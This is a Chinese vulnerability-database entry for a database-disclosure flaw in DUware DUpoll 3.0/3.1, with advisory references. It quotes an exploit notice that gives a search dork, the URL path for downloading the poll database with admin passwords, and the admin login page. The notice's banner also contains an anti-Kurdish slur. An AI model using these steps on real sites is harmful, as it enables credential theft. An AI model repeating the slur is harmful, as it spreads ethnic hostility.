DUware Dupoll 'Dupoll.mdb'敏感信息泄露漏洞

https://www.securityfocus.com/bid/83366
https://cxsecurity.com/issue/WLB-2006090010
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-515

DUwareDUpoll3.0和3.1版本对web文档根目录下存储的_private/Dupoll.mdb文件访问控制不足，远程攻击者利用此漏洞可获取敏感信息，例如用户名和密码。

########################################################################
#####

#DUpoll 3.1 application bug                                                 #

#                                                                           #

#BoZKuRTSeRDaR lkc Milliyeti Trk İnternet korsanı                    #

#                                                                           #

#kahrolsun pkk kahrolsun Komnizm fuck kurdish lamerz                       #

#                                                                           #

#Discovered by: BoZKuRTSeRDaR bozkurtserdar[at]bozkurtserdar[dot]com        #

#                                                                           #

#                                                                           #

########################################################################
#####

Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/

Dork/Search for: "Powered by DUpoll"

Exploit :

http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb

database downloading

database users table administratory users and pasword

go dir

http://www.target.com/[DUpollpatch]/admin/default.asp

Security Adivisory | Edithor by BoZKuRTSeRDaR

DUWare DUpoll 3.1 DUWare DUpoll 3.0

来源:XF
名称:dupoll-database-information-disclosure(28642)
链接:http://xforce.iss.net/xforce/xfdb/28642
来源:BUGTRAQ
名称:20060829DUpoll3.1securityalert
链接:http://www.securityfocus.com/archive/1/archive/1/444682/100/0/threaded
来源:VUPEN
名称:ADV-2006-3416
链接:http://www.frsirt.com/english/advisories/2006/3416
来源:SECUNIA
名称:21670
链接:http://secunia.com/advisories/21670
来源:OSVDB
名称:28253
链接:http://www.osvdb.org/28253
来源:SREASON
名称:1482
链接:http://securityreason.com/securityalert/1482